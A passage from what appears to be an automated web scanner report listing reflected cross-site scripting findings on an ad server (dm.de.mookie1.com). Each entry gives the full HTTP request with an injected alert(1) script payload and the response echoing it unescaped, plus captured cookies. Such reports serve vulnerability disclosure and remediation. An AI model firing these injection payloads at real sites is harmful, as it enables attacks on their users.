Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2098105822/x235e3d8"><script>alert(1)</script>d4d7bda2c35/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.357. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16c23"-alert(1)-"dcc629a6211 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_72816c23"-alert(1)-"dcc629a6211 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_72816c23"-alert(1)-"dcc629a6211";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.358. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d922"-alert(1)-"b61cd2ce280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&9d922"-alert(1)-"b61cd2ce280=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&9d922"-alert(1)-"b61cd2ce280=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.359. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 909dd"><script>alert(1)</script>b9fcaaeb6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM909dd"><script>alert(1)</script>b9fcaaeb6dc/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM909dd"><script>alert(1)</script>b9fcaaeb6dc/2010DM/586614474/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.360. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7be0"><script>alert(1)</script>a8026b634ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMe7be0"><script>alert(1)</script>a8026b634ee/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMe7be0"><script>alert(1)</script>a8026b634ee/377113669/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.361. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e37b"><script>alert(1)</script>2414a8aeb16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1334085935@x236e37b"><script>alert(1)</script>2414a8aeb16?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1834901885/x236e37b"><script>alert(1)</script>2414a8aeb16/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.362. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccdf2"-alert(1)-"1e73f836517 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728ccdf2"-alert(1)-"1e73f836517 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728ccdf2"-alert(1)-"1e73f836517";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.363. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1334085935@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce89c"-alert(1)-"0f77d02c603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1334085935@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728&ce89c"-alert(1)-"0f77d02c603=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296257834

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&ce89c"-alert(1)-"0f77d02c603=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.364. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1394936567@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77a4b"><script>alert(1)</script>888645203e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM77a4b"><script>alert(1)</script>888645203e6/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM77a4b"><script>alert(1)</script>888645203e6/2010DM/2132523159/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.365. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1394936567@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff67"><script>alert(1)</script>487596c05e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfff67"><script>alert(1)</script>487596c05e6/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfff67"><script>alert(1)</script>487596c05e6/1937657446/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.366. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1394936567@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f5"><script>alert(1)</script>0795f99bb08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1394936567@x23b51f5"><script>alert(1)</script>0795f99bb08?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1658257177/x23b51f5"><script>alert(1)</script>0795f99bb08/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.367. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1394936567@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1466a"-alert(1)-"b3b7c22333a was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1394936567@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3001466a"-alert(1)-"b3b7c22333a HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
